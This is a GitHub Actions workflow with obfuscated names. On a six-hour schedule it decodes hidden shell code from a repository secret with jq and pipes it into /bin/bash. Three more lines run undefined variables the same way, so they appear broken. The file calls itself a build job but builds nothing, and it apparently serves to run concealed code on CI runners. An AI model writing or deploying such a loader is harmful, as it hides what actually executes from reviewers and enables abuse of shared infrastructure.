name: yanqing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '22 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanqing19871010
        env:
          pubsx831: ${{ secrets.pubsx831 }}
        run: |
          echo $pubsx831 | jq -r .dkhgb12221 | /bin/bash
          echo $cri4 | jq -r .ko9 | /bin/bash
          echo $n9265 | jq -r .pafjv8 | /bin/bash
          echo $v0524 | jq -r .r50 | /bin/bash

